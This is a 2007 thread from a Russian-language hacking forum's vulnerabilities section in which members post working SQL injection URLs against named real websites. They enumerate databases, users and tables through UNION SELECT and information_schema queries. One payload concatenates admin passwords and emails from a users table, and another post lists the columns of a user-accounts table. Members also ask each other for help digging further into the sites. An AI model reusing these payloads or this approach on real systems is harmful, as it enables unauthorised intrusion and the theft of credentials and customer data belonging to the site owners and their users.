HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.08.2007, 08:02
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

Цитата:
Сообщение от Termin@L  
http://www.gertrude.org.au/exhibition.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10/*
тут вообще хрен знает какая таблица
http://www.gertrude.org.au/exhibition.php?id=-1+union+select+database(),user(),version(),4,5,6,7 ,8,9,10/*
.ud.rt - @l.ud.rt
4.1.20

http://www.gertrude.org.au/exhibition.php?id=-1+union+select+database(),2,version(),user(),5,6,7 ,8,9,10/*
.ud.rt - ..
4.1.20
gertrude@localhost
______
сейчас дальше попробую раскопать..
 
Ответить с цитированием

  #2  
Старый 31.08.2007, 16:13
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900

Репутация: 138
По умолчанию

Код:
http://www.hww.ca/media_viewer2_top.asp?Language=E&id=203+OR+1=@@version
Таблица 'HWW_VIEW_User_Accounts'
Колонки
Цитата:
ID
First_Name
Last_Name
Organization_ID
Phone
Email
Username
Password
 
Ответить с цитированием

  #3  
Старый 31.08.2007, 18:30
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157

Репутация: 247
Отправить сообщение для n3m0 с помощью ICQ
По умолчанию

http://www.maup.com.ua/news/news.php?idn=-140+union+select+1,2,user(),database(),5,6,7,8,9,1 0,11,12,13/*
Дальше не нарыл! Помогите
 
Ответить с цитированием

  #4  
Старый 31.08.2007, 18:50
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157

Репутация: 247
Отправить сообщение для n3m0 с помощью ICQ
По умолчанию

http://romanykultury.info/news/news.php?row=-168+union+select+1,user(),3,database(),5/*
Нужно довести до ума
 
Ответить с цитированием

  #5  
Старый 31.08.2007, 18:54
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900

Репутация: 138
По умолчанию

Цитата:
Сообщение от n3m0  
http://romanykultury.info/news/news.php?row=-168+union+select+1,user(),3,database(),5/*
Нужно довести до ума
Что мешает, 5 мускул, доводи:
Код:
http://romanykultury.info/news/news.php?row=-168+union+select+1,table_name,3,4,5+from+information_schema.tables/*
 
Ответить с цитированием

  #6  
Старый 31.08.2007, 18:54
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Ну вот чуть "доведенная до ума"
Тут пятый мускул. Остается только копаться в таблицах
http://romanykultury.info/news/news.php?row=-168+union+select+1,table_name,3,4,5%20from%20infor mation_schema.tables/*


Пока писал кто-то раньше успел.... блин.
 
Ответить с цитированием

  #7  
Старый 31.08.2007, 20:55
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

protermos.ru
Код:
http://www.protermos.ru/kvl.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,88,table_name,0,1,2,3,4,5,6,7,888,99,0,1,2,3,4,5,6,7,8888,9,0,1,2,3,4,5,6,7,88888,99,0,1,2+from+information_schema.tables/*
version: 5.*
tables:

Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
address_book
address_format
banners
banners_history
categories
categories_description
configuration
configuration_group
counter
counter_history
countries
currencies
customers
customers_basket
customers_basket_attributes
customers_groups
customers_info
faqdesk
faqdesk_categories
faqdesk_categories_description
faqdesk_configuration
faqdesk_configuration_group
faqdesk_description
faqdesk_reviews
faqdesk_reviews_description
faqdesk_to_categories
geo_zones
languages
manufacturers
manufacturers_info
newsdesk
newsdesk_categories
newsdesk_categories_description
newsdesk_configuration
newsdesk_configuration_group
newsdesk_description
newsdesk_reviews
newsdesk_reviews_description
newsdesk_to_categories
newsletters
orders
orders_products
orders_products_attributes
orders_products_download
orders_status
orders_status_history
orders_total
phoroom_auth_access
phoroom_banlist
phoroom_categories
phoroom_config
phoroom_disallow
phoroom_forum_prune
phoroom_forums
phoroom_groups
phoroom_posts
phoroom_posts_text
phoroom_privmsgs
phoroom_privmsgs_text
phoroom_ranks
phoroom_search_results
phoroom_search_wordlist
phoroom_search_wordmatch
phoroom_sessions
phoroom_smilies
phoroom_themes
phoroom_themes_name
phoroom_topics
phoroom_topics_watch
phoroom_user_group
phoroom_users
phoroom_vote_desc
phoroom_vote_results
phoroom_vote_voters
phoroom_words
products
products_attributes
products_attributes_download
products_description
products_notifications
products_options
products_options_values
products_options_values_to_products_options
products_prop_options
products_prop_options_values
products_prop_options_values_to_products_prop_options
products_properties
products_to_categories
proterm_pages
proterm_pages_categories
protherm_klo
protherm_plo
protherm_tlo
reviews
reviews_description
sessions
shablon_pages
specials
tax_class
tax_rates
whos_online
zones
zones_to_geo_zones
 
Ответить с цитированием

  #8  
Старый 31.08.2007, 22:20
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

Код:
http://www.opticalsorcery.com/view_tutorial.php?id=7%20union%20select%20concat(admin,char(58),pass,char(58),user,char(58),email,char(58),ID,char(58),website,char(58),firstname,char(58),lastname)%20from%20users/*

5.0.32-Debian_7
Код:
http://www.iloveinns.com/recipes/list.php?id=7-0%20union%20select%201,version()/*

Последний раз редактировалось kair; 31.08.2007 в 23:05..
 
Ответить с цитированием

  #9  
Старый 01.09.2007, 12:01
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482

Репутация: 1796
По умолчанию

http://english.renaultclub.cz/english/links/novyodkaz.php?id='
Postorage SQL к сожелению в нем я не силен (

http://www.argelato.provincia.bologna.it/Statistica.asp?ID=
Microsoft SQL
__________________
Кто я?..

Последний раз редактировалось I-I()/Ib; 01.09.2007 в 12:16..
 
Ответить с цитированием

  #10  
Старый 01.09.2007, 18:40
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900

Репутация: 138
По умолчанию

Киномост
Код:
http://www.kinomost.ru/index.asp?case=30&distr=-1'+OR+1=(SELECT+db_name())--&pack=0
Таблицы: db_ForumPeople, db_News, akter, akter_top
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ